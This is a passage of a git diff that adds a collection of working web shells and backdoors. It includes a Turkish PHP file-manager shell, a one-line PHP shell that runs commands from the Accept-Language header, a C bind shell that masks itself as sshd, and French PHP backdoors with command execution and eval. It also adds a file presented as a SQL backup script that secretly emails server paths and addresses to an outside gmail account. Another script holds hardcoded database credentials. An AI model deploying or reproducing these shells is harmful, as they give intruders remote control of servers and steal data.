+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>
+      <br>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dosya_gonder)) {
+
+if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
+    echo "<center><font color='#0000FF'>Dosya Başarıyla Gönderildi</font></center>";
+}
+} elseif(empty($dosya_gonder)) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+} else {
+die ("<center><font color='#FF0000'>Dosya kopyalanamıyor!</font><center>");
+}
+}
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardı Üzerine Yazıldı";
+                } else {
+                        $dos = "Dosya Oluşturuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Oluşturulamıyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açılamıyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazılamıyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya İsmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluşturulamıyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Oluşturuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör İsmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açılamıyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazılamıyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Başarıyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açılamıyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 İSİMLİ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEİŞTİRİLEMEDİ!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEİŞTİRİLDİ</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GİT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BİLGİLERİ</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>İŞLEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluştur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluştur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center>Tüm hakları sahibi 	C-W-M'ye aittir</center><br>";
+?>
+
+
+
+
diff --git a/138shell/A/accept_language.txt b/138shell/A/accept_language.txt
new file mode 100644
index 0000000..b3c8e0a
--- /dev/null
+++ b/138shell/A/accept_language.txt
@@ -0,0 +1 @@
+<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
diff --git a/138shell/B/Blind Shell.cpp.txt b/138shell/B/Blind Shell.cpp.txt
new file mode 100644
index 0000000..a4d11ae
--- /dev/null
+++ b/138shell/B/Blind Shell.cpp.txt	
@@ -0,0 +1,72 @@
+#include <string.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <stdlib.h>
+#include <sys/socket.h> 
+ 
+#define BUFSIZ  256
+ 
+ 
+int main(int argc,char *argv[]){
+        int insock,s,port=31337;
+        char pass[BUFSIZ+2]="foo";
+        ssize_t size;
+        struct sockaddr_in servaddr,cliaddr;
+        unsigned int len;
+        char *newname;
+ 
+ 
+        if(fork()!=0)
+                return 0;
+ 
+        srand(time(NULL));
+        switch(rand()%4) {
+        case 0:
+                newname="sshd";
+                break;
+        case 1:
+                newname="-bash";
+                break;
+        case 2:
+                newname="sh";
+                break;
+        case 3:
+                newname="ps";
+        }
+ 
+        memset(argv[0],0,strlen(argv[0]));
+        strcpy(argv[0],newname);/*changeprocessname*/
+        close(0);
+        close(1);
+        close(2);
+        servaddr.sin_family=AF_INET;
+        servaddr.sin_port=htons(port);
+        servaddr.sin_addr.s_addr=htonl(INADDR_ANY);
+ 
+        s=socket(AF_INET,SOCK_STREAM,0);
+        bind(s,(struct sockaddr*)&servaddr,sizeof(servaddr));
+        listen(s,10);
+ 
+        for(;;) {
+                len=sizeof(cliaddr);
+                insock=accept(s,(struct sockaddr*)&cliaddr,&len);
+                if(fork()==0) {
+                        char buf[BUFSIZ+2]={};
+                        send(insock,"pass?",6,0);
+                        size=recv(insock,&buf,BUFSIZ,0);
+                        if(strncmp(buf,pass,strlen(pass))) {
+                                send(insock,"WRONG!\n",8,0);
+                                close(insock);
+                                exit(0);
+                        }
+                        dup2(insock,0);
+                        dup2(insock,1);
+                        dup2(insock,2);
+                        execl("/bin/sh","sh","-i",(char*)0);
+                        close(insock);
+                        exit(-1); /* should not reach this point */
+                }
+        }
+}
\ No newline at end of file
diff --git a/138shell/B/backdoor1.txt b/138shell/B/backdoor1.txt
new file mode 100644
index 0000000..a82e151
--- /dev/null
+++ b/138shell/B/backdoor1.txt
@@ -0,0 +1,181 @@
+<?
+/*
+   Backdoor php v0.1
+   Coded By Charlichaplin
+   charlichaplin@gmail.com
+   Join me: irc.fr.worldnet.net #s-c
+   Greetz: My dog :)
+*/
+
+class backdoor {
+   var $pwd;
+   var $rep;
+   var $list = array();
+   var $file;
+   var $edit;
+   var $fichier;
+   var $del;
+   var $shell;
+   var $proxy;
+      
+   function dir() {
+      if(!empty($this->rep)) {
+      $dir = opendir($this->rep);
+      } else {
+         $dir = opendir($this->pwd);
+      }
+      while($f = readdir($dir)) {
+          if ($f !="." && $f != "..") {
+             $this->list[] = $f;
+          }
+      }
+   }
+   
+   function view() {
+      
+      $this->file = htmlentities(highlight_file($this->file));
+   }
+   
+   function edit() {
+      if(!is_writable($this->edit)) {
+         echo "Ecriture impossible sur le fichier";
+      } elseif(!file_exists($this->edit)) {
+         echo "Le fichier n'existe pas ";
+      } elseif(!$this->fichier) {
+         $fp = fopen($this->edit,"r");
+         $a = "";
+         while(!feof($fp)) {
+            $a .= fgets($fp,1024);
+         }
+         echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";               
+      } else {
+         $fp = fopen($this->edit,"w+");
+         fwrite($fp, $this->fichier);
+         fclose($fp);
+         echo "Le fichier a été modifié";
+         
+      }
+   }
+   
+   function del() {
+      if(is_file($this->del)) {
+         if(unlink($this->del)) {
+            echo "Fichier supprimé";
+         } else {
+            echo "Vous n'avez pas les droits pour supprimer ce fichier";
+         }
+      } else {
+         echo $this->del." n'est pas un fichier";
+      }
+   }
+   
+   function shell() {
+      echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
+      system($this->shell);
+   }
+   
+   function proxy($host,$page) {
+      
+      $fp = fsockopen($host,80);
+      if (!$fp) {
+         echo "impossible d'etablir un connection avec l'host";
+      } else {
+         $header = "GET ".$page." HTTP/1.1\r\n";
+         $header .= "Host: ".$host."\r\n";
+         $header .= "Connection: close\r\n\r\n";
+         fputs($fp,$header);
+         while (!feof($fp)) {
+            $line = fgets($fp,1024);
+            echo $line;
+         }
+         fclose($fp);
+      }
+   }
+   
+   function ccopy($cfichier,$cdestination) {
+      if(!empty($cfichier) && !empty($cdestination)) {
+         copy($cfichier, $cdestination);
+         echo "Le fichier a été copié";
+      } else {
+         echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
+      }
+   }
+}
+if(!empty($_REQUEST['rep'])) {
+   $rep = $_REQUEST['rep']."/";
+}
+$pwd = $_SERVER['SCRIPT_FILENAME'];
+$pwd2  = explode("/",$pwd);
+$file = $_REQUEST['file'];
+$edit = $_REQUEST['edit'];
+$fichier = $_POST['fichier'];
+$del = $_REQUEST['del'];
+$shell = $_REQUEST['shell'];
+$proxy = $_REQUEST['proxy'];
+$copy = $_REQUEST['copy'];
+$cfichier = $_POST['cfichier'];
+$cdestination = $_POST['cdestination'];
+
+$n = count($pwd2);
+$n = $n - 1;
+$pwd = "";
+for ($i = 0;$i != $n;$i = $i+1) {
+   $pwd .= "/".$pwd2[$i];
+}
+
+if($proxy) {
+$host2 = explode("/",$proxy);
+$n = count($host2);
+$host = $host2[2];
+$page = "";
+for ($i = 3;$i != $n;$i = $i+1) {
+   $page .= "/".$host2[$i];
+}
+echo $page;
+}
+
+echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
+$backdoor = new backdoor();
+$backdoor->pwd = $pwd;
+$backdoor->rep = $rep;
+$backdoor->file = $file;
+$backdoor->edit = $edit;
+$backdoor->fichier = $fichier;
+$backdoor->del = $del;
+$backdoor->shell = $shell;
+$backdoor->proxy = $proxy;
+echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
+$backdoor->dir();
+
+echo "</TD></TR></TABLE><PRE>";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
+echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\"     \"> <A HREF=\"\">Name</A>                    <A HREF=\"\">Last modified</A>       <A HREF=\"\">Size</A>  <A HREF=\"\">Description</A>";
+echo "<HR noshade align=\"left\" width=\"80%\">";
+
+if($file) {
+   $backdoor->view();   
+} elseif($edit) {
+   $backdoor->edit();
+} elseif($del) {   
+   $backdoor->del();
+} elseif($shell) {   
+   $backdoor->shell();
+}elseif($proxy) {
+   $backdoor->proxy($host,$page);
+}elseif($copy == 1) {
+   $backdoor->ccopy($cfichier,$cdestination);
+} else {
+   echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A>         ".date("r",realpath($rep."../"))."     - <br>";
+   foreach ($backdoor->list as $key => $value) {
+      if(is_dir($rep.$value)) {
+         echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A>                  ".date("r",filemtime($rep.$value))."      -  <br>";
+      } else {
+         echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A>  <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a>          ".date("r",filemtime($rep.$value))."     1k  <br>";
+      }
+   }
+}
+echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
+echo "<center><b>Coded By Charlichaplin</b></center>";
+echo "</BODY></HTML>";
\ No newline at end of file
diff --git a/138shell/B/backdoorfr.txt b/138shell/B/backdoorfr.txt
new file mode 100644
index 0000000..7fd627a
--- /dev/null
+++ b/138shell/B/backdoorfr.txt
@@ -0,0 +1,234 @@
+<? 
+print("<html><head><title>Backdoor PHP codée par rAidEn & LFL</title></head><body
+bgcolor=\"white\" LINK=\"blue\" VLINK=\"blue\">");
+print("<p align=\"center\"><font size=\"5\">Exploit include v1.0</font></p>");
+print("<p>Ce script permet d'exploiter une faille include ou une frame mal placée de type :
+www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tant que backdoor sur un serveur pour garder une porte d'entrée dérobée.<br><br>
+<u>par rAidEn & LFL , article publié dans The Hackademy Journal numéro 12</u><br><br>Spécial greetz à : Crash_FR, MatraX, Elboras, papar0ot, Lostnoobs, Icarus, Xelory, L_Abbe, Daedel, DHS-team, Carlito, xdream_blue, redils,  IHC, Wanadobe.biz, #abyssal, #cod4, #hzv, #security-corp, #Revolsys, ...... et tout ceux que j'ai oublié & aussi et surtout à (feu)tim-team</p>");
+
+/******Code source du système de remote*****/
+
+$QS = $QUERY_STRING;
+if(!stristr($QS, "separateur") && $QS!="") $QS .= "&separateur";
+if(!stristr($QS, "separateur") && $QS=="") $QS .= "separateur";
+
+/*pour les forms*********************************/
+$tab = explode("&", $QS);
+$i=0;
+$remf = "";
+while( $tab[$i] != "" && $tab[$i-1] != "separateur" )
+{
+    $temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
+    eval("\$temp2=\${$temp};");
+    $remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
+."'>\n";
+    $i++;
+}
+/*
+$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
+if($temp!="")
+{
+    eval("\$temp2=\${$temp};");
+    $remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
+."'>\n";
+}*/
+/************************************************/
+
+
+/*pour les links*********************************/
+if($QS != "separateur")
+    $reml = "?" . str_replace(strchr($QS, "&separateur"), "", $QS) .
+"&separateur";
+else $reml = "?$QS";
+$adresse_locale = $reml;
+/************************************************/
+
+
+
+
+print("<hr>");
+print("<a href=\"$adresse_locale&option=1\">Exécuter une commande dans un shell</a><br> <!-- utiliser exec($commande, $retour); -->");
+print("<a href=\"$adresse_locale&option=2\">Exécuter du code PHP</a><br>");
+print("<a href=\"$adresse_locale&option=3\">Lister un répertoires</a><br>");
+print("<a href=\"$adresse_locale&option=4\">Gérer les fichiers</a><br>");
+print("<a href=\"$adresse_locale&option=5\">Envoyer un mail</a><br>");
+print("<a href=\"$adresse_locale&option=6\">Infos serveur</a><br>");
+print("<a href=\"mailto:raiden_cyb@hotmail.com\">Contacter le créateur</a><br><hr>");
+
+
+/* récupération des variables : la fonction $_REQUEST n'existant pas avant php 4.1.0, vous devrez alors commenter ces lignes */
+$option = $_REQUEST["option"];
+$rep =  $_REQUEST["rep"];
+$nom =  $_REQUEST["nom"];
+$option_file =  $_REQUEST["option_file"];
+$cmd =  $_REQUEST["cmd"];
+$code =  $_REQUEST["code"];
+$msg =  $_REQUEST["msg"];
+$option_mail =  $_REQUEST["option_mail"];
+$destinataire =  $_REQUEST["destinataire"];
+$sujet =  $_REQUEST["sujet"];
+$message =  $_REQUEST["message"];
+
+if($option == 1){
+    print("<form action=\"?\"> $remf Commande : <input type=\"text\" name=\"cmd\"></form>");
+    echo "<br> PS : peu de serveurs acceptent les commandes venant de PHP";
+}
+
+if($option == 2){
+    print("<form action=\"?\"> $remf Code : <input type=\"text\" name=\"code\"></form>");
+}
+
+if($option == 3){
+    print("<form action=\"?\"> $remf Répertoire à lister : <input type=\"text\" name=\"rep\"></form>");
+    print("$rep");
+}
+
+if($option == 4){
+    print("<br><form action=\"?\"> $remf");
+    print("<br>Nom du fichier :<br><input type=text name=\"nom\">");
+    print("<input type=hidden name=option value=$option>");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"mkdir\" >Créer le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"edit\" >Éditer le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"del\" >Supprimer le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"read\" CHECKED>Lire le
+fichier");
+    print("<input type=submit value=Go>");
+    print("</form>");
+}
+
+
+if($option == 5){
+    print("<PRE><form action=\"?\"> $remf Destinataire : <input type=\"text\" name=\"destinataire\" size=\"80\">");
+    print("<br>Provenance du mail : <input type=\"text\" name=\"provenance\" size=\"80\"><br>");
+    print("Adresse de retour : <input type=\"text\" name=\"retour\" size=\"80\"><br>");
+    print("Sujet : <input type=\"text\" name=\"sujet\" size=\"80\"><br>");
+    print("Message : <input type=\"text\" name=\"message\"
+size=\"80\"><br><input type=\"submit\" value=\"Envoyer\"></form></PRE>");
+}
+
+if($option == 6){
+    echo"Nom du serveur : <a href=\"http://$SERVER_NAME\">$SERVER_NAME</a><br>
+";
+    echo"Adresse IP du serveur : <a href=\"http://$SERVER_ADDR\">$SERVER_ADDR</a><br> ";
+    echo"Port utilisé par défault 80 : <font color=\"red\">$SERVER_PORT</font><br> ";
+    echo"Mail de l' admin : <a href=\"mailto:$SERVER_ADMIN\">$SERVER_ADMIN</a><br><br>";
+    
+    
+    echo"Racine du serveur : <font color=\"red\">$DOCUMENT_ROOT</font><br>";
+    echo"Adresse menant à COMMAND.COM : <font color=\"red\">$COMSPEC</font><br>";
+    echo"Path installé sur le serveur : <font color=\"red\">$PATH</font> <br>";
+    echo"OS, SERVEUR, version PHP : <font color=\"red\">$SERVER_SOFTWARE</font><br><br>";
+    
+    echo"Version du protocole utilisé (HTTP) : <font color=\"red\">$SERVER_PROTOCOL</font><br>";
+    echo"En-tête Accept du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT</font><br>";
+    echo"En tête User_agent du protocole HTTP : <font color=\"red\">$HTTP_USER_AGENT</font><br>";
+    echo"En-tête Accept-Charset du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_CHARSET</font><br> ";
+    echo"En-tête Accept-Encoding du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_ENCODING</font><br> ";
+    echo"En-tête Accept-Language du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_LANGUAGE</font><br> ";
+    echo"En-tête Connection du protocole HTTP : <font color=\"red\">$HTTP_CONNECTION</font><br> ";
+    echo"En-tête Host du protocole HTTP : <font color=\"red\">$HTTP_HOST</font><br><br>";
+    
+    echo"Version de CGI : <font color=\"red\">$GATEWAY_INTERFACE</font><br> ";
+    echo"Version de récupération du form : <font color=\"red\">$REQUEST_METHOD</font><br> ";
+    echo"Argument de l' adresse : <font color=\"red\">$QUERY_STRING</font> <br>";
+    echo"Nom du script : <font color=\"red\">$SCRIPT_NAME</font><br> ";
+    echo"Chemin du script : <font color=\"red\">$SCRIPT_FILENAME</font><br> ";
+    echo"Adresse entière du script : <font color=\"red\">$REQUEST_URI
+</font><br>";
+}
+
+/* Commande*******/
+if($cmd != "")
+{
+    echo "{${passthru($cmd)}}<br>";
+}
+/* Commande*******/
+
+
+/* Exécution de code PHP**********/
+if($code != ""){
+    $code = stripslashes($code);
+    eval($code);
+}
+/* Execution de code PHP**********/
+
+
+/* Listing de rep******************/
+if($rep != "")
+{
+    if(strrchr($rep, "/") != "" ||  !stristr($rep, "/")) $rep .= "/";
+    $dir=opendir($rep);
+    while ($file = readdir($dir)) 
+    {
+    	    if (is_dir("$rep/$file") && $file!='.')
+	    { 
+    		    echo"<li><a href=\"$adresse_locale&rep=$rep$file\">(rep) $file
+</a><br>\n";
+	    }elseif(is_file("$rep/$file"))
+	    {
+	    	    echo "<li>	<a
+href=\"$adresse_locale&option_file=read&nom=$rep$file\">(file) $file</a> <a
+href=\"$adresse_locale&option_file=del&nom=$rep$file\">del</a> <a
+href=\"$adresse_locale&option_file=edit&nom=$rep$file\">edit</a><br>\n";
+	    }
+    }
+}
+/* Listing de rep******************/
+
+
+/* Gestion des fichiers*********************/
+if($option_file == "mkdir" && $nom != "")
+{
+    $fp = fopen($nom, "w");
+    fwrite($fp, stripslashes($msg));
+    print("Fichier crée/modifié");
+}
+
+if($option_file == "read" && $nom != "")
+{
+    $fp = fopen($nom, "r");
+    $file = fread($fp, filesize($nom));
+    $file = htmlentities ($file, ENT_QUOTES);
+    $file = nl2br($file);
+    echo "<br>$file";
+}
+
+if($option_file == "del" && $nom != "")
+{
+    unlink($nom);
+    print("Fichier effacé");
+}
+
+if($option_file == "edit" && $nom != "")
+{
+    $fp = fopen($nom, "r");
+    $file = fread($fp, filesize($nom));
+    $file = htmlentities ($file, ENT_QUOTES);
+    echo "<form action=$adresse_locale> $remf";
+    echo "<TEXTAREA COLS=80 rows=25 name=msg>$file</textarea>";
+    echo "<input type=hidden name=option_file value=mkdir>";
+    echo "<input type=hidden name=nom value=$nom>";
+    echo "<br><input type=submit value=Go> PS : les fichiers trop longs ne passent po :(";
+    echo "</form>";
+}
+/* Gestion des fichiers*********************/
+
+
+/* Envoi de mails************************/
+if(($destinataire != "" ) && ($sujet != "") && ($message != "")){
+    $option_mail = "From: $provenance \n";
+    $option_mail .= "Reply-to: $retour \n";
+    $option_mail .= "X-Mailer: Mailer by rAidEn \n";
+    
+    mail($destinataire, $sujet, $message, $option_mail);
+    
+    print("Mail envoyé a : $destinataire ...");
+}
+/* Envoi de mails************************/
+
+print("</body></html>");
+/*print("<noscript><script=\"");*/
+?>
\ No newline at end of file
diff --git a/138shell/B/backup.php.txt b/138shell/B/backup.php.txt
new file mode 100644
index 0000000..b430551
--- /dev/null
+++ b/138shell/B/backup.php.txt
@@ -0,0 +1,21 @@
+<?php
+include ("config.php");db_connect();header('Content-Type: application/octetstream');header('Content-Disposition: filename="linksbox_v2.sql"');$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$sd98="john.barker446@gmail.com";$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+header('Pragma: no-cache');header('Expires: 0');
+$data .= "#phpMyAdmin MySQL-Dump \r\n";
+$data .="# http://phpwizard.net/phpMyAdmin/ \r\n";
+$data .="# http://www.phpmyadmin.net/ (download page) \r\n";
+$data .= "#$database v2.0 Database Backup\r\n";
+$data .= "#Host: $server\r\n";
+$data .= "#Database: $database\r\n\r\n";
+$data .= "#Table add_links:\r\n";$result = mysql_query("SELECT * FROM add_links");while ($a = mysql_fetch_array($result)) {
+	foreach ($a as $key => $value) {
+		$a[$key] = addslashes($a[$key]);
+	}
+	$data .= "INSERT INTO add_links VALUES ('0','$a[link]', '$a[description]', '$a[tooltip]', '$a[hits]'); \r\n#endquery\r\n";
+}
+
+
+echo $data;
+
+?>
+   
\ No newline at end of file
diff --git a/138shell/B/backupsql.php.txt b/138shell/B/backupsql.php.txt
new file mode 100644
index 0000000..5bf310a
--- /dev/null
+++ b/138shell/B/backupsql.php.txt
@@ -0,0 +1,170 @@
+<?php
+/*
+* Backup script on server.
+*
+* Runs on the server, called by Cron. Connects to the mySQL
+* database and creates a backup file of the whole database.
+* Saves to file in current directory.
+*
+* @author Cow <cow@invisionize.com>
+* @version 0.2
+* @date 18/08/2004
+* @package Backup Server
+* Upgraded Ver 2.0 (sending sql backup as attachment
+* as email attachment, or send to a remote ftp server by
+* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
+* Neagu Mihai<neagumihai@hotmail.com>
+*/
+
+set_time_limit(0);
+$date = date("mdy-hia");
+$dbserver = "localhost";
+$dbuser = "vhacker_robot";
+$dbpass = "mp2811987";
+$dbname = "tvhacker_vbb3";
+$file = "N-Cool-$date.sql.gz";
+$gzip = TRUE;
+$silent = TRUE;
+
+function write($contents) {
+    if ($GLOBALS['gzip']) {
+        gzwrite($GLOBALS['fp'], $contents);
+    } else {
+        fwrite($GLOBALS['fp'], $contents);
+    }
+}
+
+mysql_connect ($dbserver, $dbuser, $dbpass);
+mysql_select_db($dbname);
+
+if ($gzip) {
+    $fp = gzopen($file, "w");
+} else {
+    $fp = fopen($file, "w");
+}
+
+$tables = mysql_query ("SHOW TABLES");
+while ($i = mysql_fetch_array($tables)) {
